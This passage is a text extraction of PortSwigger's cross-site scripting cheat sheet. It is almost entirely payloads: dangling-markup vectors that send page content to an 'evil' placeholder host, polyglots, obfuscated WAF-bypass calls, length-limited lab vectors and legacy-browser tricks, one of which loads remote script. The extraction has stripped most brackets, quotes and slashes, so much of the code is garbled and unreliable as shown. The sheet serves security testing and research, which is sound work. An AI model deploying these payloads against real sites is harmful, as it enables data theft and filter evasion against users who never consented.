Savan Gadhiya(NotSoSecure)

49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt

Scriptless attacks

Dangling markup

Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil

Link href stylesheet ltlink rel=stylesheet href=evil

Link href icon ltlink rel=icon href=evil

Meta refresh ltmeta http-equiv=refresh content=0 httpevil

Img to pass markup through src attribute ltimg src=evil ltimage src=evil

Video using track element ltvideogtlttrack default src=evil

Video using source element and src attribute ltvideogtltsource src=evil

Audio using source element and src attribute ltaudiogtltsource src=evil

Input src ltinput type=image src=evil

Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil

Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil

Form using action ltbutton form=x style=width100height100gtltform id=x action=evil

Object data ltobject data=evil

Iframe src ltiframe src=evil

Embed src ltembed src=evil

Embed src ltembed src evil

Use textarea to consume markup and post toexternal site

ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt

Pass markup data through windowname using formtarget

ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=

Pass markup data through windowname using basetarget

lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=

Pass markup data through windowname usingformtarget

ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=

Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil

Using embed window name to pass data from thepage

ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=

Using iframe window name to pass data from thepage

ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=

Using object window name to pass data from thepage

ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=

Using frame window name to pass data from thepage

ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=

Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil

Polyglots

Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt

Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt

Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt

WAF bypass global objects

XSS into a JavaScript string string concatenation(window)

window[ale+rt](window[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(self)

self[ale+rt](self[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(this)

this[ale+rt](this[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(top)

top[ale+rt](top[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(parent)

parent[ale+rt](parent[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(frames)

frames[ale+rt](frames[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(globalThis)

globalThis[ale+rt](globalThis[doc+ument][dom+ain])

XSS into a JavaScript string comment syntax(window)

window[fooalertbar](window[foodocumentbar][domain])

XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])

XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])

XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])

XSS into a JavaScript string comment syntax(parent)

parent[fooalertbar](parent[foodocumentbar][domain])

XSS into a JavaScript string comment syntax(frames)

frames[fooalertbar](frames[foodocumentbar][domain])

XSS into a JavaScript string comment syntax(globalThis)

globalThis[fooalertbar](globalThis[foodocumentbar][domain])

XSS into a JavaScript string hex escape sequence(window)

window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(self)

self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(this)

this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(top)

top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(parent)

parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(frames)

frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequence(globalThis)

globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])

XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)

window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)

self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)

this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)

top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)

parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)

frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))

XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]

XSS into a JavaScript string hex escape sequence

and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))

XSS into a JavaScript string octal escape sequence(window)

window[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(self)

self[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(this)

this[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(top)

top[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(parent)

parent[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(frames)

frames[141154145162164](130123123)

XSS into a JavaScript string octal escape sequence(globalThis)

globalThis[141154145162164](130123123)

XSS into a JavaScript string unicode escape(window)

window[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape(parent)

parent[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape(frames)

frames[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string unicode escape(globalThis)

globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)

XSS into a JavaScript string RegExp sourceproperty (window)

window[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (self)

self[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (this)

this[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (top)

top[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (parent)

parent[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (frames)

frames[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (globalThis)

globalThis[alsource+ertsource](XSSsource)

XSS into a JavaScript string HieroglyphyJSFuck(window)

window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(self)

self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(this)

this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(top)

top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(parent)

parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(frames)

frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(globalThis)

globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

Impossible labs

Classic vectors (XSS crypt)

Image src with JavaScript protocol ltimg src=javascriptalert(1)gt

Body background with JavaScript protocol ltbody background=javascriptalert(1)gt

Iframe data urls no longer work as modern browsersuse a null origin

ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt

Title Description Lengthlimit

Closest vector Link

Basic context WAFblocks lt[a-zA-Z]

This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag

NA NA 128279

Script based injectionbut quotes forwardslash and backslash areescaped

We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block

The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML

NA NA 128279

innerHTML context butno equals allowed

You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event

NA NA 128279

Basic context lengthlimit

This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it

15 ltq oncut=alert`` 128279

Attribute context lengthlimit

The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it

14 oncut=alert`` 128279

Basic context lengthlimit arbitrary code

Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code

19 ltqoncut=eval(name)

128279

Attribute context lengthlimit arbitrary code

Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript

17 See link 128279

Injection occurs inside aframeset but before thebody

We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy

NA NA 128279

Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed

The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`

NA NA 128279

VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt

JScript compact was a minimal version of JS thatwasnt widely used in IE

lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt

JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt

VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt

JavaScript entities used to work in NetscapeNavigator

lta title=ampalert(1)gtXSSltagt

JavaScript stylesheets used to be supported byNetscape Navigator

ltlink href=xssjs rel=stylesheet type=textjavascriptgt

Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme

IE9 select elements and plaintext used to consumemarkup

ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt

XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt

XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt

CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt

In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt

Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt

Older versions of IE supported event handlers infunctions

ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt

y

ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt

GreyMagic HTML+time exploit (no longer workseven in 5 docmode)

ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt

Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt

Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt

Firefox allows NULL characters inside openingcomments

lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt

Safari used to allow any tag to have a onload eventinside SVG

ltsvggtltxss onload=alert(1)gt

Isindex using src attribute ltisindex type=image src=evil

Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil

Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt

Isindex and action ltisindex type=submit action=javascriptalert(1)gt

CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes

This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request